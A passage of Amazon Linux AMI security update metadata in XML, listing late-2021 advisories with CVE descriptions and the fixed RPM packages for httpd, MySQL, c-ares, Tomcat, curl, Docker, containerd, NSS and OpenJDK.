version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.51" release="1.94.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.51" release="1.94.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.51-1.94.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.51" release="1.94.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.51-1.94.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1544</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1544: medium priority package update for mysql57</title><issued date="2021-10-29 16:27:00" /><updated date="2021-11-04 18:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-2385:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1992307: CVE-2021-2385 mysql: Server: Replication unspecified vulnerability (CPU Jul 2021)
CVE-2021-2372:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1992303: CVE-2021-2372 mysql: InnoDB unspecified vulnerability (CPU Jul 2021)
CVE-2021-2356:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.9 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H).
1992299: CVE-2021-2356 mysql: Server: Replication unspecified vulnerability (CPU Jul 2021)
CVE-2021-2342:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.34 and prior and 8.0.25 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1992294: CVE-2021-2342 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2021)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2342" title="" id="CVE-2021-2342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2356" title="" id="CVE-2021-2356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2372" title="" id="CVE-2021-2372" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2385" title="" id="CVE-2021-2385" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-embedded-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.35" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.35-1.17.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.35-1.17.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.35" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.35-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1545</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1545: medium priority package update for c-ares</title><issued date="2021-10-29 16:37:00" /><updated date="2021-11-04 18:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3672:
A flaw was found in c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames which might potentially lead to Domain Hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.
1988342: CVE-2021-3672 c-ares: Missing input validation of host names may lead to domain hijacking
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3672" title="" id="CVE-2021-3672" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares-devel" version="1.17.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.17.2-1.8.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.17.2-1.8.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.17.2-1.8.amzn1.x86_64.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.17.2-1.8.amzn1.i686.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.17.2-1.8.amzn1.i686.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.17.2-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1546</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1546: important priority package update for tomcat8</title><issued date="2021-10-29 16:37:00" /><updated date="2021-11-04 18:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42340:
A memory leak flaw was found in Apache Tomcat, where an HTTP upgrade connection does not release for WebSocket connections once the WebSocket connection is closed. If a sufficient number of such requests are made, an OutOfMemoryError occurs, leading to a denial of service. The highest threat from this vulnerability is to system availability.
2014356: CVE-2021-42340 tomcat: OutOfMemoryError caused by HTTP upgrade connection leak could lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42340" title="" id="CVE-2021-42340" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.72-1.89.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.72" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.72-1.89.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1547</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1547: important priority package update for tomcat8</title><issued date="2021-10-26 23:35:00" /><updated date="2025-04-09 20:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-21733:
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.
CVE-2021-41079:
A flaw was found in Apache Tomcat. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet can trigger an infinite loop, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
CVE-2021-33037:
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33037" title="" id="CVE-2021-33037" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41079" title="" id="CVE-2021-41079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733" title="" id="CVE-2024-21733" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-el-3.0-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.69-1.88.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.69" release="1.88.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.69-1.88.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1549</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1549: medium priority package update for curl</title><issued date="2021-11-10 22:13:00" /><updated date="2021-11-15 18:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22947:
A flaw was found in curl. The flaw lies in how curl handles cached or pipelined responses that it receives from either a IMAP, POP3, SMTP or FTP server before the TLS upgrade using STARTTLS. In such a scenario curl even after upgrading to TLS would trust these cached responses treating them as valid and authenticated and use them. An attacker could potentially use this flaw to carry out a Man-In-The-Middle attack. The highest threat from this vulnerability is to data confidentiality.
2003191: CVE-2021-22947 curl: Server responses received before STARTTLS processed after TLS handshake
CVE-2021-22946:
A flaw was found in curl. This flaw lies in the --ssl-reqd option or related settings in libcurl. Users specify this flag to upgrade to TLS when communicating with either IMAP, POP3 or a FTP server. An attacker controlling such servers could return a crafted response which could lead to curl client continue its operation without TLS encryption leading to data being transmitted in clear text over the network. The highest threat from this vulnerability is to data confidentiality.
2003175: CVE-2021-22946 curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22946" title="" id="CVE-2021-22946" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22947" title="" id="CVE-2021-22947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.100.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.100.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.100.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.100.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.100.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.100.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1550</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1550: medium priority package update for docker</title><issued date="2021-11-11 20:21:00" /><updated date="2021-11-11 20:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-21285:
A flaw was found in Docker. Pulling an intentionally malformed Docker image manifest could lead to a crash of the `dockerd` daemon, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
1924742: CVE-2021-21285 docker: daemon crash during image pull of malicious image
CVE-2021-21284:
A flaw was found in the `userns-remap` feature of Docker. The root user in the remapped namespace can modify files under /var/lib/docker/<remapping>, leading to possible privilege escalation to the root user in the host. The highest threat from this vulnerability is to data integrity.
1924740: CVE-2021-21284 docker: access to remapped root allows privilege escalation to real root
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21284" title="" id="CVE-2021-21284" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21285" title="" id="CVE-2021-21285" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="20.10.7" release="2.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.7-2.69.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.7" release="2.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.7-2.69.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1551</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1551: medium priority package update for containerd docker</title><issued date="2021-11-17 15:38:00" /><updated date="2021-11-18 21:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-41190:
In the OCI Distribution Specification version 1.0.0 and prior and in the OCI Image Specification version 1.0.1 and prior, manifest and index documents are ambiguous without an accompanying Content-Type HTTP header. Versions of Moby (Docker Engine) prior to 20.10.11 and versions of containerd prior to 1.4.12 and 1.5.8 treat the Content-Type header as trusted and deserialize the document according to that header. If the Content-Type header changed between pulls of the same ambiguous document (with the same digest), the document may be interpreted differently, meaning that the digest alone is insufficient to unambiguously identify the content of the image.
CVE-2021-41190 docker:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41190" title="" id="CVE-2021-41190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-stress" version="1.4.6" release="7.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-7.11.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="7.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-7.11.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.6" release="7.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-7.11.amzn1.x86_64.rpm</filename></package><package name="docker" version="20.10.7" release="5.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-20.10.7-5.76.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="20.10.7" release="5.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-20.10.7-5.76.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1552</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1552: critical priority package update for nss</title><issued date="2021-12-01 08:34:00" /><updated date="2021-12-01 21:18:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-43527:
NSS (Network Security Services) up to and including 3.73 is vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \#7, or PKCS \#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS.
When verifying a DER-encoded signature, NSS decodes the signature into a fixed-size buffer and passes the buffer to the underlying PKCS \#11 module. The length of the signature is not correctly checked when processing DSA and RSA-PSS signatures. DSA and RSA-PSS signatures larger than 16384 bits will overflow the buffer in VFYContextStr. The vulnerable code is located within secvfy.c:vfy_CreateContext.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43527" title="" id="CVE-2021-43527" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-pkcs11-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.53.1" release="7.87.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.53.1-7.87.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.53.1-7.87.amzn1.i686.rpm</filename></package><package name="nss" version="3.53.1" release="7.87.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.53.1-7.87.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1553</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1553: critical priority package update for java-1.8.0-openjdk java-1.7.0-openjdk java-1.6.0-openjdk</title><issued date="2021-12-17 17:39:00" /><updated date="2021-12-17 22:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-45046:
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
CVE-2021-44228:
A flaw was found in the Java logging library Apache Log4j 2 in versions from 2.0-beta9 and before and including 2.14.1. This could allow a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228" title="" id="CVE-2021-44228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046" title="" id="CVE-2021-45046" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.261-2.6.22.1.84.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.84.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.84.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.84.amzn1" epoch="1" 